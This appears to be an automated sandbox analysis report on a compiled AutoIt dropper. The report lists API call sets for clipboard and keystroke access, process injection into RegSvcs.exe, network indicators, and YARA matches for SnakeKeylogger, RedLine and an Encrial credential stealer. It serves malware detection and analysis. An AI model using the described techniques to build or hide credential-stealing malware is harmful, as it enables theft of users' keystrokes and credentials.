Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00694164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00694164

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00694164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00694164
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01054164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_01054164

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00693F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00693F66

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0068001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0068001C

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_006ACABC
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0106CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0106CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.27d0ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.porcelainization.exe.3580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.27d0ee8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.27d0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.porcelainization.exe.18e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.27d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1530661018.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.1650477461.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00623B3A
Source: yqfze5TKW7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: yqfze5TKW7.exe, 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b52448ac-9
Source: yqfze5TKW7.exe, 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3bceba6a-f
Source: yqfze5TKW7.exe, 00000000.00000003.1511017459.0000000003FA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f7ff12af-2
Source: yqfze5TKW7.exe, 00000000.00000003.1511017459.0000000003FA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a0801b4b-b
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00FE3B3A
Source: porcelainization.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: porcelainization.exe, 00000002.00000000.1511361867.0000000001094000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8ce7ed2e-5
Source: porcelainization.exe, 00000002.00000000.1511361867.0000000001094000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a60841d9-1
Source: porcelainization.exe, 00000005.00000000.1630246411.0000000001094000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e177a9f2-c
Source: porcelainization.exe, 00000005.00000000.1630246411.0000000001094000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_8c436777-8
Source: yqfze5TKW7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_412935ab-f
Source: yqfze5TKW7.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c8159506-a
Source: porcelainization.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d618db3a-3
Source: porcelainization.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_eb5f5b3f-4

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0068A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0068A1EF

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00678310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00678310

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_006851BD
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_010451BD

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064D975	0_2_0064D975
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006421C5	0_2_006421C5
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006562D2	0_2_006562D2
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006A03DA	0_2_006A03DA
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0065242E	0_2_0065242E
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006425FA	0_2_006425FA
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0067E616	0_2_0067E616
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006366E1	0_2_006366E1
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0062E6A0	0_2_0062E6A0
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0065878F	0_2_0065878F
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00656844	0_2_00656844
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006A0857	0_2_006A0857
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00638808	0_2_00638808
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00688889	0_2_00688889
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064CB21	0_2_0064CB21
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00656DB6	0_2_00656DB6
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00636F9E	0_2_00636F9E
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00633030	0_2_00633030
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064F1D9	0_2_0064F1D9
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00643187	0_2_00643187
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00621287	0_2_00621287
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00641484	0_2_00641484
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00635520	0_2_00635520
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00647696	0_2_00647696
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00635760	0_2_00635760
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00641978	0_2_00641978
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00659AB5	0_2_00659AB5
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0062FCE0	0_2_0062FCE0
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006A7DDB	0_2_006A7DDB
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064BDA6	0_2_0064BDA6
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00641D90	0_2_00641D90
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0062DF00	0_2_0062DF00
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00633FE0	0_2_00633FE0
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_016B0980	0_2_016B0980
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100D975	2_2_0100D975
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010021C5	2_2_010021C5
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010603DA	2_2_010603DA
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010162D2	2_2_010162D2
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010025FA	2_2_010025FA
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0101242E	2_2_0101242E
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF66E1	2_2_00FF66E1
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FEE6A0	2_2_00FEE6A0
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0101878F	2_2_0101878F
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0103E616	2_2_0103E616
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF8808	2_2_00FF8808
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01016844	2_2_01016844
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01060857	2_2_01060857
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01048889	2_2_01048889
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100CB21	2_2_0100CB21
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01016DB6	2_2_01016DB6
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF6F9E	2_2_00FF6F9E
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01003187	2_2_01003187
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF3030	2_2_00FF3030
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100F1D9	2_2_0100F1D9
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FE1287	2_2_00FE1287
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01001484	2_2_01001484
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF5520	2_2_00FF5520
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01007696	2_2_01007696
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF5760	2_2_00FF5760
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01001978	2_2_01001978
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01019AB5	2_2_01019AB5
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FEFCE0	2_2_00FEFCE0
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01001D90	2_2_01001D90
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100BDA6	2_2_0100BDA6
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01067DDB	2_2_01067DDB
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FF3FE0	2_2_00FF3FE0
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FEDF00	2_2_00FEDF00
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_011743B0	2_2_011743B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418244	3_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401650	3_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418788	3_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02781448	3_2_02781448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02781437	3_2_02781437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027811A8	3_2_027811A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027811A4	3_2_027811A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDA9A0	3_2_05FDA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD4D78	3_2_05FD4D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD9C40	3_2_05FD9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD7720	3_2_05FD7720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD4718	3_2_05FD4718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD39FF	3_2_05FD39FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDE5F0	3_2_05FDE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDE5E0	3_2_05FDE5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD65C0	3_2_05FD65C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD35B8	3_2_05FD35B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD65B1	3_2_05FD65B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD35A8	3_2_05FD35A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDE198	3_2_05FDE198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDE188	3_2_05FDE188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD4D6C	3_2_05FD4D6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6168	3_2_05FD6168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD3160	3_2_05FD3160
